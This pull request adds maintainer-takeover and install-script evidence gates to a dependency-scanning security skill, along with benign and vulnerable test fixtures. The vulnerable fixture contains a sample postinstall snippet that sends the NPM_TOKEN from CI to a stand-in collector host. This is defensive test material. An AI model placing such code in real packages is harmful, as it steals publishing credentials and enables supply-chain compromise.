### PR TITLE
fix(#1910): add maintainer takeover and install-script behavior evidence gates for dependency-scanning

### DIFF
--- a/skills/appsec/dependency-scanning/SKILL.md
+++ b/skills/appsec/dependency-scanning/SKILL.md
@@ -12,7 +12,7 @@ phase: [build, deploy]
 frameworks: [SLSA-v1.0, CycloneDX, SPDX, CISA-KEV]
 difficulty: intermediate
 time_estimate: "15-30min"
-version: "1.0.0"
+version: "1.0.1"
 author: unitoneai
 license: MIT
 allowed-tools: Read, Grep, Glob
@@ -251,3 +251,55 @@ This skill processes user-supplied content including package manifests, lockfile
 - [NIST NVD](https://nvd.nist.gov/)
 - [OpenSSF Scorecard](https://securityscorecards.dev/)
 - [Executive Order 14028 - Improving the Nation's Cybersecurity](https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/)
+
+## Maintainer Takeover and Install-Script Behavior Evidence Gates
+
+### Gate 1: Maintainer History Check
+
+Evaluate publisher tenure, churn, and reputation:
+
+```
+# Evidence items (at least 2 required)
+- Publisher has >12 month history with the package
+- No recent (<90 days) maintainer additions or transfers
+- Publisher email/identity consistent across versions
+- No history of malicious packages under publisher account
+```
+
+### Gate 2: Publisher Provenance Verification
+
+Cross-check publisher identity with cryptographic verification:
+
+```
+# Evidence items (at least 2 required)
+- Package signed with Sigstore or GPG
+- Publisher identity matches GitHub verified org or known identity
+- npm provenance statement present and verifiable
+- Package attestation from CI build pipeline
+```
+
+### Gate 3: Install-Script Behavior Classification
+
+Categorize scripts by access type and conditionality:
+
+```
+# Evidence items (at least 2 required)
+- Script purpose documented (build, compile, code-gen)
+- No network access in install script (or blocked in CI)
+- No file-system write outside package directory
+- No conditional execution based on environment variables
+- Script is deterministic (same output given same input)
+```
+
+### Gate 4: CI Sandbox Evidence
+
+Confirm CI sandbox blocks dangerous access patterns:
+
+```
+# Evidence items (at least 2 required)
+- CI egress disabled during package install
+- Registry allow-list restricts install sources
+- Network access monitored and logged
+- File-system sandbox restricts write scope
+- Build runs in ephemeral environment (no persistent state)
+```

--- a/skills/appsec/dependency-scanning/tests/benign/benign-provenance-native-build.md
+++ b/skills/appsec/dependency-scanning/tests/benign/benign-provenance-native-build.md
@@ -1,0 +1,29 @@
+---
+name: benign-provenance-native-build
+expected: pass
+---
+
+# Benign package with verified provenance and CI sandbox
+
+## Package metadata
+
+```
+package: native-addon
+postinstall: node-gyp rebuild
+publisher: verified_org
+provenance: sigstore_verified
+script_network_access: blocked_in_CI
+```
+
+## Evidence
+
+| Field | Value |
+|---|---|
+| Maintainer history | Stable — same publisher for 18 months |
+| Publisher verification | Sigstore + GitHub verified org |
+| Script behavior | Native build only — no network, env, or conditional execution |
+| CI sandbox | Egress disabled, registry allow-list enabled |
+
+## Expected review result
+
+Pass the takeover gates. The package is from a verified publisher with stable history, native-build-only script, and CI sandbox controls.

--- a/skills/appsec/dependency-scanning/tests/vulnerable/vulnerable-recent-transfer-with-exfil-script.md
+++ b/skills/appsec/dependency-scanning/tests/vulnerable/vulnerable-recent-transfer-with-exfil-script.md
@@ -1,0 +1,40 @@
+---
+name: vulnerable-recent-transfer-with-exfil-script
+expected: fail
+---
+
+# Vulnerable package with recent maintainer transfer and data exfiltration
+
+## Package metadata
+
+```
+package: build-helper
+version: 4.2.1
+release_age: 2 days
+maintainer_change: new_publisher_added_3_days_before_release
+postinstall: node scripts/setup.js
+```
+
+## Script evidence
+
+```javascript
+if (process.env.CI && process.env.NPM_TOKEN) {
+  fetch("https://collector.example/upload", {
+    method: "POST",
+    body: process.env.NPM_TOKEN
+  })
+}
+```
+
+## Evidence
+
+| Field | Value |
+|---|---|
+| Maintainer history | Recent transfer (3 days before release) |
+| Publisher verification | None — no Sigstore, no GPG |
+| Script behavior | Network access with conditional CI token exfiltration |
+| CI sandbox | None observed — outbound connections not blocked |
+
+## Expected review result
+
+Fail the review. Recent maintainer transfer, missing provenance verification, and network exfiltration in install script create high supply-chain risk.


### PR DESCRIPTION
Adds maintainer history check, publisher provenance verification, install-script behavior classification, and CI sandbox evidence gates.

Closes #1910